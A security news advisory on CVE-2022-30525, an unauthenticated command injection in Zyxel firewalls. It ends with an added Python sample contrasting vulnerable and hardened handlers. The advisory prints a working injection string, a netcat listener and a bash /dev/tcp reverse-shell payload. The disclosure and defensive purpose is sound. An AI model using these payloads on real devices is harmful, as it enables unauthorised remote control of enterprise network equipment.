Vulnerability in Zyxel firewalls allowing code execution without authentication

A critical vulnerability (CVE-2022-30525) has been identified in Zyxel devices of the ATP, VPN and USG FLEX series, which are designed to manage firewall, IDS and VPN operation in enterprises. It allows an external attacker to execute code on the device without authentication and without holding any user privileges. To carry out the attack, the attacker must be able to send requests to the device over the HTTP/HTTPS protocol. Zyxel fixed the vulnerability in the ZLD 5.30 firmware update. According to the Shodan service, there are currently 16213 potentially vulnerable devices on the global network that accept requests over HTTP/HTTPS.

The attack is carried out by sending specially crafted commands to the /ztp/cgi-bin/handler web handler, which is reachable without authentication. The problem is caused by a lack of proper sanitization of request parameters when commands are executed on the system through an os.system call used in the lib_wan_settings.py library, which is invoked when processing the setWanPortSt operation.

For example, an attacker can pass the string “; ping 192.168.1.210;”, which results in the command "ping 192.168.1.210" being executed on the system. To obtain access to a command shell, one can run “nc -lvnp 1270” on one's own system and then initiate a reverse connection by sending the device a request containing '; bash -c \"exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\";'.
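As an added illustration of the bug class described above (not Zyxel's code, and not taken from the article), the following Python shows the injection pattern of splicing an unauthenticated request parameter into an os.system string next to a hardened handler that validates the value and avoids the shell entirely; the function and parameter names are assumptions, and "echo" stands in for the real interface command so the sample runs anywhere.

```python
# Added illustration (not Zyxel's code) of the bug class the advisory
# describes: an unauthenticated request parameter spliced into an os.system
# string, next to a hardened handler. Names below are assumptions; "echo"
# stands in for the real interface command so the sample runs anywhere.
import re
import shlex
import subprocess

# Allow-list for the port/interface parameter, e.g. "wan1" or "lan2".
_IFACE_RE = re.compile(r"[a-z]+[0-9]{0,2}")


def unsafe_command(iface: str) -> str:
    # Vulnerable pattern: untrusted text becomes part of a shell command line.
    # os.system(unsafe_command("; ping 192.168.1.210;")) would also run ping.
    return f"echo link {iface} up"


def count_shell_commands(cmdline: str) -> int:
    # Count how many commands /bin/sh would execute for this line by
    # tokenizing with shell punctuation and counting command separators.
    lexer = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    separators = sum(1 for tok in lexer if tok in (";", "&&", "||", "|"))
    return separators + 1


def safe_run(iface: str) -> str:
    # Hardened pattern: reject anything outside the allow-list, then call the
    # program with an argv list so no shell ever parses the value.
    if not _IFACE_RE.fullmatch(iface):
        raise ValueError(f"rejected interface name: {iface!r}")
    result = subprocess.run(["echo", "link", iface, "up"],
                            capture_output=True, text=True, check=True)
    return result.stdout


if __name__ == "__main__":
    payload = "; ping 192.168.1.210;"  # the advisory's example input
    for value in ("wan1", payload):
        line = unsafe_command(value)
        print(f"{line!r} -> {count_shell_commands(line)} command(s)")
    print(safe_run("wan1").strip())
    try:
        safe_run(payload)
    except ValueError as exc:
        print("blocked:", exc)
```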

Source: opennet.ru
